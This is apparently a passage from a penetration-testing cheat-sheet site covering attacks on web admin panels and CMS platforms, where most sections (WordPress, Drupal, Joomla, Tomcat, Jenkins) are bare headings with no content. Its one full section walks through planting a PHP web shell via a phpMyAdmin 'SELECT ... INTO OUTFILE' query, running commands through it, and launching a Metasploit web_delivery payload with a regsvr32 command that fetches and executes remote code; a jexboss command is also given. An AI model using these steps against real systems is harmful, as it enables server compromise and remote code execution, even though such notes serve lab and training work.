CMS
JBOSS/JMX
python jexboss.py -host http://10.10.10.87:80PHPMyAdmin
PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide
range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users,
permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.
Prepering VM. First we have to change our config file C:\xampp\apache\conf\extra\httpd-xampp.conf and allow to remote user access our
PHP admin panel. In order to enable it we need to add "allow from 10.0.2.26" and:
<Directory "C:/xampp/">
AllowOverride AuthConfig Limit
Order allow,deny
Allow from all
Require all granted
</Directory>
After this our server is ready to be compromised.
1. Go to main XAMP page,
2. Go to phpMyAdmin,
3. Create new databse,
4. Execute SQL Query: SELECT "<?php system($_GET[‘cmd’]); ?>" into outfile “C:\\xampp\\htdocs\\backdoor.php” !!Remeber to chane "'" sings
to the new one. Because of different encoding it can cause error.
5. Now we created a new php file in main directory where HTTP resources are stored.
6. Like we can see "http://10.0.2.10/backdoor.php" exist, now we can interact with victim machine.
7. http://10.0.2.10/backdoor.php?cmd=dir will list the content of directory where PHP shell is stored.
8. Now run MSFCONSOLE.
9. We need to USE module exploits/multi/script/web_delivery.rb
IMPORTANT ! exploit/windows/misc/regsvr32_applocker_bypass_server is no longer valid. !
10. During configuration options remeber to change target:
msf exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 PSH (Binary)
11. Execute command regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll using our PHP shell. Session is created.
The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system,
regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the
specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download
and execute) can occur on the same port.Automatic scanners
Wordpress
Wordpress Plugin
Wordpress Manual Enum:
Wordpress panel RCE
Wordpress WFuzz Plugins
WordPress NMAP
Wordpress panel RCE
Plugin Reverse Shell
Drupal
Username enumeration
Hidden pages enumeration
Drupal panel RCE
Drupal Brute Force
Joomla
NMAP Joomla
Joomla BruteForce Script
Joomla Authenticated RCE
Tomcat
Default credentials
NMAP
go-tomcat-mgmt-scanner
Brute force
Tomcat panel RCE
Tomcat-users.xml
Uploading WebShell
script - cmdjsp.jsp
Changes to Above Script
Uploading with Curl

It worked

WebDav
HTTP brute force authentication
HTTP basic authentication
HTTP GET request
HTTP POST request
Spidering / Brute force directories / files
Jenkins
Last updated
Was this helpful?